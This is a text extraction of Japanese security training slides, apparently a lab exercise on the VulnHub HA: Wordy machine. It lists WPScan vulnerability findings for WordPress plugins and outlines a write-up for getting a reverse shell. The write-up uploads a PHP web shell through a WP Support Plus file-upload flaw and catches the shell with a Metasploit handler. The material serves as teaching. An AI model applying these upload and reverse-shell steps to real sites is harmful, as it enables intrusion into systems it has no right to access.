[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 別の方法でReverse Shellを奪取しよう！

90. © 2021 Ierae Security Inc. All Rights Reserved. 89
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 別の方法でReverse Shellを奪取しよう！

91. © 2021 Ierae Security Inc. All Rights Reserved. 90
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 別の方法でReverse Shellを奪取しよう！

92. © 2021 Ierae Security Inc. All Rights Reserved. 91
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 別の方法でReverse Shellを奪取しよう！

93. © 2021 Ierae Security Inc. All Rights Reserved. 92
チャレンジ問題のヒント
 WPScanのReferencesやGoogle検索からExploit Codeを見つけよう！
 ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう！
 ヒント

94. © 2021 Ierae Security Inc. All Rights Reserved. 93
チャレンジ問題のヒント
 WPScanのReferencesやGoogle検索からExploit Codeを見つけよう！
 ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう！
 ヒント

95. © 2021 Ierae Security Inc. All Rights Reserved. 94
チャレンジ問題のヒント
 WPScanのReferencesやGoogle検索からExploit Codeを見つけよう！
 ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう！
 ヒント

96. © 2021 Ierae Security Inc. All Rights Reserved. 95
チャレンジ問題 Writeup
チャレンジ問題 Writeup

97. © 2021 Ierae Security Inc. All Rights Reserved. 96
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

98. © 2021 Ierae Security Inc. All Rights Reserved. 97
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

99. © 2021 Ierae Security Inc. All Rights Reserved. 98
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
 別の方法でReverse Shellを奪取しよう！

100. © 2021 Ierae Security Inc. All Rights Reserved. 99
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
vim exploit.html
cp shell.php shell.phtml
python3 –m http.server 80
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

101. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
msf6 exploit(multi/handler) > options
msf6 exploit(multi/handler) > run
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

102. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

103. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

104. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
 別の方法でReverse Shellを奪取しよう！
URL：https://www.vulnhub.com/entry/ha-wordy,363/

105. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
 別の方法でReverse Shellを奪取しよう！

106. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
 Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
 別の方法でReverse Shellを奪取しよう！